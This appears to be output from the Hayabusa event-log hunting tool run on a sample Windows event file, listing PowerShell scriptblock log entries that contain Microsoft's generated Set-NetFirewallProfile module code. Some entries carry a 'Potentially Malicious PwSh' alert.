$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; 
Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 
'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cm",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"Name='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('Name', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Enabled')) { [object]$__cmdletization_value = ${Enabled} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'Enabled'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultInboundAction')) { [object]$__cmdletization_value = ${DefaultInboundAction} $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultInboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DefaultOutboundAction')) { [object]$__cmdletization_value = ${DefaultOutboundAction} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DefaultOutboundAction'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowInboundRules')) { [object]$__cmdletization_value = ${AllowInboundRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 
'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowInboundRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalFirewallRules')) { [object]$__cmdletization_value = ${AllowLocalFirewallRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalFirewallRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowLocalIPsecRules')) { [object]$__cmdletization_value = ${AllowLocalIPsecRules} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = 
[Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowLocalIPsecRules'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserApps')) { [object]$__cmdletization_value = ${AllowUserApps} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserApps'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUserPorts')) { [object]$__cmdletization_value = ${AllowUserPorts} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUserPorts'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = 
$__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('AllowUnicastResponseToMulticast')) { [object]$__cmdletization_value = ${AllowUnicastResponseToMulticast} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'AllowUnicastResponseToMulticast'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NotifyOnListen')) { [object]$__cmdletization_value = ${NotifyOnListen} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'NotifyOnListen'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('EnableStealthModeForIPsec')) { [object]$__cmdletization_value = ${EnableStealthModeForIPsec} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'EnableStealthModeForIPsec'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cm",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { [object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; 
IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} 
$__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisabledInterfaceAliases')) { [object]$__cmdletization_value = ${DisabledInterfaceAliases} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent 
= $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'DisabledInterfaceAliases'; ParameterType = 'System.String[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:ModifyInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallProfile.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Set-NetFirewallProfile' -Alias '*'",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.700 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"dletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogFileName')) { 
[object]$__cmdletization_value = ${LogFileName} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogFileName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogMaxSizeKilobytes')) { [object]$__cmdletization_value = ${LogMaxSizeKilobytes} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogMaxSizeKilobytes'; ParameterType = 'System.UInt64'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogAllowed')) { [object]$__cmdletization_value = ${LogAllowed} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogAllowed'; 
ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogBlocked')) { [object]$__cmdletization_value = ${LogBlocked} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogBlocked'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('LogIgnored')) { [object]$__cmdletization_value = ${LogIgnored} $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{Name = 'LogIgnored'; ParameterType = 'Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.GpoBoolean'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
